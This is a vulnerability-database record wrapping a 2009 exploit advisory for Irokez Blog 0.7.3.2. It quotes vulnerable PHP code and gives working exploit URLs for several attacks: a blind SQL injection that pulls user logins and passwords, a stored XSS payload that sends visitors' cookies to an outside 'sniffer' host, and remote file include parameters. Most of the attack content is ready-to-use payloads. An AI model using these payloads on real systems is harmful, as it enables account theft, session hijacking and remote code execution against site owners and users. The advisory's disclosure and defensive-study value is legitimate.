{"id": "PACKETSTORM:75248", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Irokez Blog 0.7.3.2 XSS / RFI / SQL Injection", "description": "", "published": "2009-02-27T00:00:00", "modified": "2009-02-27T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/75248/Irokez-Blog-0.7.3.2-XSS-RFI-SQL-Injection.html", "reporter": "Corwin", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:27:58", "viewCount": 11, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "c11c860fbc5eafa5aade642c3e078997"}, "sourceHref": "https://packetstormsecurity.com/files/download/75248/irokez-sqlxss.txt", "sourceData": "`================================================================================ \n|| Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS \n================================================================================ \n \nApplication: Irokez Blog \n------------ \nWebsite: http://irokez.org \n-------- \nVersion: All (0.7.3.2) \n-------- \nDate: 11-02-2009 \n----- \n \n[ BLIND SQL-INJECTION ] \n \n[ SOME VULNERABLE CODE ] \n \n/classes/table.class.php \n \n... \nif ($is_trans) { \n$query = \"select t.*, m.* from {$this->_name} m\" \n. \" left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)\" \n. 
\" where m.id = '$id' group by {$this->_lang}\"; \n} else { \n$query = \"select * from {$this->_name} where id = '$id'\"; \n} \n$result = $this->db->exeQuery($query); \n \n===>>> Exploit: \n \nhttp://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115 \nhttp://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114 \netc \n \n[ ACTIVE XSS ] \n \nin comments. \n \n[ SOME VULNERABLE CODE ] \n \n/scripts/blog/output-post.inc.php \n \n<input id=\"name\" type=\"text\" class=\"text\" name=\"name\" value=\"<?php echo $name?>\" /> \n<label for=\"name\"><?php echo $GLOBALS['LANG']['blog']['name']?></label> \n</li> \n<li> \n<input id=\"email\" type=\"text\" class=\"text\" name=\"email\" value=\"<?php echo $email?>\" /> \n<label for=\"email\"><?php echo $GLOBALS['LANG']['blog']['email']?></label> \n</li> \n<li> \n<input id=\"site\" type=\"text\" class=\"text\" name=\"site\" value=\"<?php echo $site?>\" /> \n<label for=\"site\"><?php echo $GLOBALS['LANG']['blog']['site']?></label> \n... \n<textarea id=\"message\" name=\"message\" class=\"textarea\"><?php echo $message?></xtextarea> \n \n===>>> Exploit: \n \n<script>img = new Image(); img.src = \"http://sniffer/sniff.jpg?\"+document.cookie;</script> \n \n[ INCLUDE ] \n \n[ SOME VULNERABLE CODE ] \n \n/thumbnail.php \n... \nob_start(); \nswitch ($module) { \ncase 'gallery': \ninclude_once $GLOBALS['PTH']['classes'] . 'gallery.class.php'; \n$Obj = new TBL_Gallery; \n$image_path = $GLOBALS['PTH']['gallery'] . 
getVar($Obj->select($id), 'src'); \nbreak; \ndefault: \n$image_path = ''; \n} \n \n===>>> Exploit: \n \nhttp://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include] \nhttp://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include] \nhttp://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include] \nhttp://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include] \n \nAuthor: Eugene \"Corwin\" Ermakov \n------- \n \nContact: corwin88[dog]mail[dot]ru \n-------- \n \n`\n"}